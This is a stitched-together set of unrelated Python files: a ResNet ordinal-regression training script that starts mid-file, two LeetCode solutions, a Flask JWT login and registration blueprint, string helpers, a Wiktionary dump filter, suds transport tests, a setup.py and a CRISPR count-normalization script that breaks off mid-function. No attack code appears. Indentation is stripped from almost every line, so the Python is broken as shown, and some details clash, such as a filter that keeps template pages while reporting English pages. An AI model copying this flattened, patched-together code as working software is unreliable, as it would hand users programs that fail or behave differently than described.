SKIP_TRAIN_EVAL = args.skip_train_eval
SAVE_MODELS = args.save_models
if args.cuda >= 0 and torch.cuda.is_available():
DEVICE = torch.device(f'cuda:{args.cuda}')
else:
DEVICE = torch.device('cpu')
if args.seed == -1:
RANDOM_SEED = None
else:
RANDOM_SEED = args.seed
PATH = args.outpath
if not os.path.exists(PATH):
os.mkdir(PATH)
cuda_device = DEVICE
if torch.cuda.is_available():
cuda_version = torch.version.cuda
else:
cuda_version = 'NA'
info_dict = {
'settings': {
'script': os.path.basename(__file__),
'pytorch version': torch.__version__,
'cuda device': str(cuda_device),
'cuda version': cuda_version,
'random seed': RANDOM_SEED,
'learning rate': LEARNING_RATE,
'num epochs': NUM_EPOCHS,
'batch size': BATCH_SIZE,
'output path': PATH,
'training logfile': os.path.join(PATH, 'training.log')}
}
create_logfile(info_dict)
# Deterministic CUDA & cuDNN behavior and random seeds
#set_deterministic()
set_all_seeds(RANDOM_SEED)
###################
# Dataset
###################
if args.dataset == 'mnist':
from constants import MNIST_INFO as DATASET_INFO
from torchvision.datasets import MNIST as PyTorchDataset
from dataset import mnist_train_transform as train_transform
from dataset import mnist_validation_transform as validation_transform
elif args.dataset == 'morph2':
from constants import MORPH2_INFO as DATASET_INFO
from dataset import Morph2Dataset as PyTorchDataset
from dataset import morph2_train_transform as train_transform
from dataset import morph2_validation_transform as validation_transform
elif args.dataset == 'morph2-balanced':
from constants import MORPH2_BALANCED_INFO as DATASET_INFO
from dataset import Morph2Dataset as PyTorchDataset
from dataset import morph2_train_transform as train_transform
from dataset import morph2_validation_transform as validation_transform
else:
raise ValueError('Dataset choice not supported')
###################
# Dataset
###################
if args.dataset == 'mnist':
NUM_CLASSES = 10
GRAYSCALE = True
RESNET34_AVGPOOLSIZE = 1
train_dataset = PyTorchDataset(root='./datasets',
train=True,
download=True,
transform=train_transform())
valid_dataset = PyTorchDataset(root='./datasets',
train=True,
transform=validation_transform(),
download=False)
test_dataset = PyTorchDataset(root='./datasets',
train=False,
transform=validation_transform(),
download=False)
train_indices = torch.arange(1000, 60000)
valid_indices = torch.arange(0, 1000)
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(valid_indices)
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=False, # SubsetRandomSampler shuffles
drop_last=True,
num_workers=NUM_WORKERS,
sampler=train_sampler)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS,
sampler=valid_sampler)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
else:
GRAYSCALE = False
RESNET34_AVGPOOLSIZE = 4
df = pd.read_csv(DATASET_INFO['TRAIN_CSV_PATH'], index_col=0)
classes = df[DATASET_INFO['CLASS_COLUMN']].values
del df
train_labels = torch.tensor(classes, dtype=torch.float)
NUM_CLASSES = torch.unique(train_labels).size()[0]
del classes
train_dataset = PyTorchDataset(csv_path=DATASET_INFO['TRAIN_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=train_transform())
test_dataset = PyTorchDataset(csv_path=DATASET_INFO['TEST_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=validation_transform())
valid_dataset = PyTorchDataset(csv_path=DATASET_INFO['VALID_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=validation_transform())
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=NUM_WORKERS)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
info_dict['dataset'] = DATASET_INFO
info_dict['settings']['num classes'] = NUM_CLASSES
##########################
# MODEL
##########################
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes, grayscale):
self.num_classes = num_classes
self.inplanes = 64
if grayscale:
in_dim = 1
else:
in_dim = 3
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(in_dim, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(RESNET34_AVGPOOLSIZE)
self.fc = nn.Linear(512, (self.num_classes-1))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, (2. / n)**.5)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = self.fc(x)
logits = logits.view(-1, (self.num_classes-1))
probas = torch.sigmoid(logits)
return logits, probas
def resnet34(num_classes, grayscale):
"""Constructs a ResNet-34 model."""
model = ResNet(block=BasicBlock,
layers=[3, 4, 6, 3],
num_classes=num_classes,
grayscale=grayscale)
return model
###########################################
# Initialize Cost, Model, and Optimizer
###########################################
model = resnet34(NUM_CLASSES, GRAYSCALE)
model.to(DEVICE)
if args.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
elif args.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), lr=LEARNING_RATE,
momentum=0.9)
else:
raise ValueError('--optimizer must be "adam" or "sgd"')
if args.scheduler:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min',
verbose=True)
start_time = time.time()
best_mae, best_rmse, best_epoch = 999, 999, -1
info_dict['training'] = {
'num epochs': NUM_EPOCHS,
'iter per epoch': len(train_loader),
'minibatch loss': [],
'epoch train mae': [],
'epoch train rmse': [],
'epoch train acc': [],
'epoch valid mae': [],
'epoch valid rmse': [],
'epoch valid acc': [],
    'best running mae': np.inf,
    'best running rmse': np.inf,
'best running acc': 0.,
'best running epoch': -1
}
for epoch in range(1, NUM_EPOCHS+1):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
# FORWARD AND BACK PROP
logits, probas = model(features)
# ### Ordinal loss
loss = loss_conditional_v2(logits, targets, NUM_CLASSES)
# ##--------------------------------------------------------------------###
optimizer.zero_grad()
loss.backward()
optimizer.step()
# ITERATION LOGGING
iteration_logging(info_dict=info_dict, batch_idx=batch_idx,
loss=loss, train_dataset=train_dataset,
frequency=50, epoch=epoch)
# EPOCH LOGGING
# function saves best model as best_model.pt
best_mae = epoch_logging(info_dict=info_dict,
model=model, train_loader=train_loader,
valid_loader=valid_loader,
which_model='conditional-argmax',
loss=loss, epoch=epoch, start_time=start_time,
skip_train_eval=SKIP_TRAIN_EVAL)
if args.scheduler:
scheduler.step(info_dict['training']['epoch valid rmse'][-1])
# ####### AFTER TRAINING EVALUATION
# function saves last model as last_model.pt
info_dict['last'] = {}
aftertraining_logging(model=model, which='last', info_dict=info_dict,
train_loader=train_loader,
valid_loader=valid_loader, test_loader=test_loader,
which_model='conditional-argmax',
start_time=start_time)
info_dict['best'] = {}
aftertraining_logging(model=model, which='best', info_dict=info_dict,
train_loader=train_loader,
valid_loader=valid_loader, test_loader=test_loader,
which_model='conditional-argmax',
start_time=start_time)
# ######### MAKE PLOTS ######
plot_training_loss(info_dict=info_dict, averaging_iterations=100)
plot_mae(info_dict=info_dict)
plot_accuracy(info_dict=info_dict)
# ######### PER-CLASS MAE PLOT #######
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
drop_last=False,
num_workers=NUM_WORKERS)
for best_or_last in ('best', 'last'):
model.load_state_dict(torch.load(
os.path.join(info_dict['settings']['output path'], f'{best_or_last}_model.pt')))
names = {0: 'train',
1: 'test'}
for i, data_loader in enumerate([train_loader, test_loader]):
true_labels = get_labels_from_loader(data_loader)
# ######### SAVE PREDICTIONS ######
all_probas, all_predictions = save_predictions(model=model,
which=best_or_last,
which_model='conditional-argmax',
info_dict=info_dict,
data_loader=data_loader,
prefix=names[i])
errors, counts = compute_per_class_mae(actual=true_labels.numpy(),
predicted=all_predictions.numpy())
info_dict[f'per-class mae {names[i]} ({best_or_last} model)'] = errors
#actual_selfentropy_best, best_selfentropy_best =\
# compute_selfentropy_for_mae(errors_best)
#info_dict['test set mae self-entropy'] = actual_selfentropy_best.item()
#info_dict['ideal test set mae self-entropy'] = best_selfentropy_best.item()
plot_per_class_mae(info_dict)
# ######## CLEAN UP ########
json.dump(info_dict, open(os.path.join(PATH, 'info_dict.json'), 'w'), indent=4)
if not SAVE_MODELS:
os.remove(os.path.join(PATH, 'best_model.pt'))
os.remove(os.path.join(PATH, 'last_model.pt'))
|
# author: Fei Gao
#
# Reverse Integer
#
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
#
# click to show spoilers.
# Have you thought about this?
# Here are some good questions to ask before coding. Bonus points
# for you if you have already thought through this!
# If the integer's last digit is 0, what should the output be? ie,
# cases such as 10, 100.
# Did you notice that the reversed integer might overflow? Assume
# the input is a 32-bit integer, then the reverse of 1000000003
# overflows. How should you handle such cases?
# Throw an exception? Good, but what if throwing an exception is
# not an option? You would then have to re-design the function
# (ie, add an extra parameter).
class Solution:
# @return an integer
def reverse(self, x):
return int((('-' if x < 0 else '') + str(abs(x))[::-1]))
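# The spoiler above asks about 32-bit overflow, which Solution.reverse() does not handle.
# A hedged variant (not part of the original solution) that returns 0 on overflow,
# following the common LeetCode convention for this problem:
def reverse_within_32_bits(x):
    sign = -1 if x < 0 else 1
    result = sign * int(str(abs(x))[::-1])
    return result if -2**31 <= result <= 2**31 - 1 else 0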
def main():
solver = Solution()
tests = [123, -123, 0, -1]
for test in tests:
print(test)
print(' ->')
result = solver.reverse(test)
print(result)
print('~' * 10)
pass
if __name__ == '__main__':
main()
pass
|
from flask import jsonify, request
from flask_jwt_extended import create_access_token, jwt_refresh_token_required, get_current_user
from app.blueprints.recipes.errors import bad_request, error_response
from app.blueprints.auth import bp
from app.blueprints.auth.helpers import get_fresh_jwt_token, send_password_reset_email
from app.services.auth import create_user, get_user_by_email, verify_reset_password_token, set_new_password
from app.utils.validators import validate_email, validate_username, validate_password
@bp.route('/login', methods=['POST'])
def login():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
payload = get_fresh_jwt_token(username, password, with_refresh_token=True)
if payload:
return jsonify(payload), 200
else:
return error_response(401, "Bad username or password")
@bp.route('/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
user = get_current_user()
ret = {
'access_token': create_access_token(identity=user, fresh=False)
}
return jsonify(ret), 200
@bp.route('/fresh-login', methods=['POST'])
def fresh_login():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
payload = get_fresh_jwt_token(username, password, with_refresh_token=False)
if payload:
return jsonify(payload), 200
else:
return error_response(401, "Bad username or password")
@bp.route('/validate', methods=['POST'])
def validate():
json = request.json
if json:
email = json.get('email', None)
username = json.get('username', None)
else:
return bad_request("Lack of required payload data")
payload = {}
if email is not None:
is_valid, check_dict = validate_email(email)
payload['email'] = {'valid': is_valid, 'checks': check_dict}
if username is not None:
is_valid, check_dict = validate_username(username)
payload['username'] = {'valid': is_valid, 'checks': check_dict}
return jsonify(payload), 200
@bp.route('/register', methods=['POST'])
def register():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
email = json.get('email', '')
else:
return bad_request("Lack of required payload data")
payload = {}
is_email_valid, email_check_dict = validate_email(email)
payload['email'] = {'valid': is_email_valid, 'checks': email_check_dict}
is_username_valid, username_check_dict = validate_username(username)
payload['username'] = {'valid': is_username_valid, 'checks': username_check_dict}
is_password_valid, password_check_dict = validate_password(password)
payload['password'] = {'valid': is_password_valid, 'checks': password_check_dict}
    if is_email_valid and is_password_valid and is_username_valid:
create_user(username, email, password)
status_code = 201
else:
status_code = 422
return jsonify(payload), status_code
@bp.route('/reset_password', methods=['POST'])
def reset_password_request():
json = request.json
if json:
email = json.get('email', '')
else:
return bad_request("Lack of required payload data")
user = get_user_by_email(email)
if user:
send_password_reset_email(user)
return jsonify({'message': 'Done!'}), 202
else:
return error_response(422, "Email address not registered")
@bp.route('/reset_password/<token>', methods=['POST'])
def reset_password(token):
json = request.json
if json:
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
user = verify_reset_password_token(token)
if not user:
return error_response(401, 'Invalid token')
is_password_valid, password_check_dict = validate_password(password)
if is_password_valid:
set_new_password(user, password)
return jsonify({'message': 'Done!'}), 200
else:
payload = {'password': {'valid': is_password_valid, 'checks': password_check_dict}}
return jsonify(payload), 422
|
import string
def filter_to_list(filterFunc, l):
return list(filter(filterFunc, l))
def keys_from_template_string(tempStr):
    stringTuples = list(string.Formatter().parse(tempStr))
    # Special case: empty string or string with no template arguments
    if len(stringTuples) == 0:
        return []
    firstTuple = stringTuples[0]
    if firstTuple[1] is None and firstTuple[2] is None and firstTuple[3] is None:
        return []
    else:
        keyNames = list(map(lambda el: el[1], stringTuples))
        return list(filter(lambda x: x is not None, keyNames))
def have_keys_for_template_string(d, tempStr):
tempStrKeys = keys_from_template_string(tempStr)
if(len(tempStrKeys) == 0):
return True
else:
return set(tempStrKeys).issubset(set(d))
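# Small usage sketch of the helpers above (illustrative template and values):
if __name__ == '__main__':
    template = "{user} owes {amount}"
    print(keys_from_template_string(template))                                  # ['user', 'amount']
    print(have_keys_for_template_string({'user': 'a', 'amount': 1}, template))  # True
    print(have_keys_for_template_string({'user': 'a'}, template))               # False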
|
#!/usr/bin/env python3
import os
import sys
import argparse
pageCount = 0
noErrors = True
def updatePageCount():
global pageCount
pageCount += 1
sys.stdout.write("\rFound {} pages".format(pageCount))
sys.stdout.flush()
def printMessage(message):
sys.stdout.write(message)
sys.stdout.flush()
def main():
parser = argparse.ArgumentParser(
description='Extract data from Wiktionary xml dump'
)
parser.add_argument(
'file',
type=str,
help='Wiktionary xml dump of article pages'
)
parser.add_argument(
'-o',
type=str,
help='Output file name'
)
args = parser.parse_args()
inputfile = None
outputfile = None
if not os.path.isfile(args.file):
printMessage("File {} does not exist. Exiting...".format(args.file))
sys.exit()
try:
inputfile = open(args.file, 'r', encoding='utf-8')
outputfile = open(args.file + '.en', 'w+', encoding='utf-8')
line = inputfile.readline()
        # Find first occurrence of <page>
while line:
if '<page>' in line:
updatePageCount()
break
line = inputfile.readline()
page = ''
while line:
if '</page>' in line:
page += line
if '<ns>10</ns>' in page:
outputfile.writelines(page)
page = ''
elif '<page>' in line:
updatePageCount()
page = ''
page += line
else:
page += line
line = inputfile.readline()
except Exception as e:
global noErrors
noErrors = False
        printMessage(str(e))
return
finally:
inputfile.close()
outputfile.close()
if noErrors:
printMessage('English pages extracted successfully')
return
if __name__ == '__main__':
main()
|
#######################################################################
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Courtesy of https://github.com/armooo/suds_requests
# author: Jason Michalski
# email: armooo@armooo.net
# License: MIT
#######################################################################
import os
import sys
import mock
import pytest
import requests
import suds.transport
PROJECT_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__),
os.pardir)
)
sys.path.append(PROJECT_ROOT)
import RFEM.suds_requests as suds_requests
def test_no_errors():
m = mock.Mock(__name__='m')
f = suds_requests.handle_errors(m)
assert f() == m.return_value
def test_HTTPError():
resp = mock.Mock(status_code=404,
content=b'File not found')
m = mock.Mock(
side_effect=requests.HTTPError(response=resp),
__name__='m',
)
f = suds_requests.handle_errors(m)
with pytest.raises(suds.transport.TransportError) as excinfo:
f()
assert excinfo.value.httpcode == 404
assert excinfo.value.fp.read() == b'File not found'
def test_RequestException():
m = mock.Mock(
side_effect=requests.RequestException(),
__name__='m',
)
f = suds_requests.handle_errors(m)
with pytest.raises(suds.transport.TransportError) as excinfo:
f()
assert excinfo.value.httpcode == 000
assert excinfo.value.fp.read().startswith(b'Traceback')
def test_open():
session = mock.Mock()
session.get.return_value.content = b'abc123'
transport = suds_requests.RequestsTransport(session)
request = suds.transport.Request('http://url')
response = transport.open(request)
assert response.read() == b'abc123'
def test_send():
session = mock.Mock()
session.post.return_value.content = b'abc123'
session.post.return_value.headers = {
1: 'A',
2: 'B',
}
session.post.return_value.status_code = 200
transport = suds_requests.RequestsTransport(session)
request = suds.transport.Request(
'http://url',
'I AM SOAP! WHY AM I NOT CLEAN!!!',
)
request.headers = {
'A': 1,
'B': 2,
}
reply = transport.send(request)
session.post.assert_called_with(
'http://url',
data='I AM SOAP! WHY AM I NOT CLEAN!!!',
headers={
'A': 1,
'B': 2,
},
)
assert reply.code == 200
assert reply.headers == {
1: 'A',
2: 'B',
}
assert reply.message == b'abc123'
|
# encoding='utf-8'
'''
/**
 * This is the solution of problem No. 867 on LeetCode;
 * the website of the problem is as follows:
 * https://leetcode-cn.com/problems/transpose-matrix
 *
 * The description of the problem is as follows:
 * ==========================================================================================================
 * Given a matrix A, return the transpose of A.
 *
 * The transpose of a matrix flips it over its main diagonal, switching the matrix's row and column indices.
 *
 * Example 1:
 *
 * Input: [[1,2,3],[4,5,6],[7,8,9]]
 * Output: [[1,4,7],[2,5,8],[3,6,9]]
 * Example 2:
 *
 * Input: [[1,2,3],[4,5,6]]
 * Output: [[1,4],[2,5],[3,6]]
 *
 * Source: LeetCode (力扣)
 * ==========================================================================================================
 *
 * @author zhangyu (zhangyuyu417@gmail.com)
 */
'''
from typing import List
import numpy as np
class Solution:
    def transpose(self, arr: List[List[int]]) -> List[List[int]]:
        '''
        Transpose a 2-D array using zip.
        Args:
            arr: 2-D array
        Returns:
            the transposed array
        '''
        return [list(row) for row in zip(*arr)]
    # Note: this second definition overrides the zip-based version above and is the one
    # actually called in __main__.
    def transpose(self, arr: List[List[int]]) -> List[List[int]]:
        '''
        Transpose a 2-D array element by element using numpy.
        Args:
            arr: 2-D array
        Returns:
            the transposed array
        '''
        m, n = len(arr[0]), len(arr)
        new_arr = np.zeros((m, n), dtype=int)
        for i in range(len(arr)):
            for j in range(len(arr[0])):
                new_arr[j][i] = arr[i][j]
        return new_arr
if __name__ == '__main__':
nums = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
solution = Solution()
res = solution.transpose(nums)
print(res)
|
import setuptools
requirements = ["click >= 7.0", "Pillow >= 7.0.0"]
dev_requirements = ["black >= 19.10b0", "pre-commit >= 1.20.0"]
test_requirements = [
"coveralls >= 1.11.0",
"pytest >= 5.2.4",
"pytest-cov >= 2.8.1",
"pytest-mock >= 2.0.0",
]
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="embroidery",
version="0.0.1",
author="Gustavo Barbosa",
author_email="gustavocsb@gmail.com",
description="Embroider build variants to your mobile app icon",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/barbosa/embroidery",
packages=setuptools.find_packages(),
install_requires=requirements,
extras_require={"dev": dev_requirements, "test": test_requirements},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points="""
[console_scripts]
embroidery = embroidery:embroidery
""",
zip_safe=False,
include_package_data=True,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 13 09:23:51 2017
@author: philipp
"""
# Analyze count distribution
# =======================================================================
# Imports
from __future__ import division # floating point division by default
import sys
import yaml
import os
import glob
import pandas
import scipy.stats.mstats as sc
import numpy
import time
def Normalization():
# ------------------------------------------------
# Print header
# ------------------------------------------------
print('++++++++++++++++++++++++++++++++++++++++++++++++')
start = time.time()
# ------------------------------------------------
# Get parameters
# ------------------------------------------------
configFile = open('configuration.yaml','r')
config = yaml.safe_load(configFile)
configFile.close()
ScriptsDir = config['ScriptsDir']
sgRNAReadCountDir = config['sgRNAReadCountDir']
GeneReadCountDir = config['GeneReadCountDir']
delta = config['delta']
norm = config['Normalization']
RoundCount = config['RoundCount']
NormSuffix = '_normalized.txt'
N0 = 1000000
eps = 0.001
# ------------------------------------------------
# Get files
# ------------------------------------------------
os.chdir(sgRNAReadCountDir)
FileNames_u = glob.glob('*_GuideCounts.txt')
colnames_u = ['sgRNA','gene','counts']
os.chdir(GeneReadCountDir)
FileNames_g = glob.glob('*_GeneCounts.txt')
colnames_g = ['gene','counts']
# ------------------------------------------------
# Normalization to counts per million
# ------------------------------------------------
if norm == 'cpm':
print('Normalizing to counts per million reads ...')
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * N0)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * N0 for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * N0)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * N0 for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization to mean total read count across replicates
# ------------------------------------------------------------
elif norm == 'total':
print('Normalizing to mean total read count ...')
os.chdir(sgRNAReadCountDir)
TotalCounts = list()
for filename in FileNames_u:
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
TotalCounts.append(numpy.sum(x))
MeanCount = numpy.mean(TotalCounts)
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * MeanCount)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * MeanCount for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * MeanCount)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * MeanCount for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization by size-factor (Love et al., Genome Biol 2014)
# ------------------------------------------------------------
elif norm == 'size':
print('Normalizing by size-factors ...')
# Establish data frame
os.chdir(sgRNAReadCountDir)
filename = FileNames_u[0]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
sgIDs = list(SampleFile['sgRNA'])
geneIDs = list(SampleFile['gene'])
L = len(sgIDs)
RawCounts = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
SizeFactors = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
# Compute geometric means for all sgRNAs
print('Computing geometric means ...')
for filename in FileNames_u:
sample = filename[0:-16]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
RawCounts[sample] = x
SizeFactors[sample] = [x[k] if x[k]>0 else x[k]+eps for k in range(L)]
geomean = [sc.gmean(list(SizeFactors.iloc[k,2:])) for k in range(L)]
SizeFactors['Geom mean'] = geomean
# Compute size-factors for each sgRNA and each sample
print('Computing sgRNA size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
x = SizeFactors[sample]
g0 = SizeFactors['Geom mean']
x0_k = [x[k]/g0[k] for k in range(L)]
SizeFactors[sample+' sgRNA size-factors'] = [x0_k[k] for k in range(L)]
# Compute size-factor for each sample
print('Computing sample size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
SizeFactors[sample+' size-factor'] = numpy.median(SizeFactors[sample+' sgRNA size-factors'])
# Write size-factor dataframe
SizeFactors.to_csv('Size-factors.txt',sep='\t',index=False)
# Write normalized counts dataframe
print('Writing normalized read counts ...')
# sgRNA counts
for filename in FileNames_u:
sample = filename[0:-16]
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k])) \
for k in range(L)]
else:
ReadsPerGuide_0 = [RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k] for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
sample = filename[0:-15]
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j])) \
for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j] for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Spelling error catch
# ------------------------------------------------------------
else:
print('### ERROR: Check spelling of Normalization parameter in configuration file! ###')
# --------------------------------------
# Time stamp
# --------------------------------------
os.chdir(ScriptsDir)
end = time.time()
# Final time stamp
print('------------------------------------------------')
print('Script completed.')
sec_elapsed = end - start
if sec_elapsed < 60:
time_elapsed = sec_elapsed
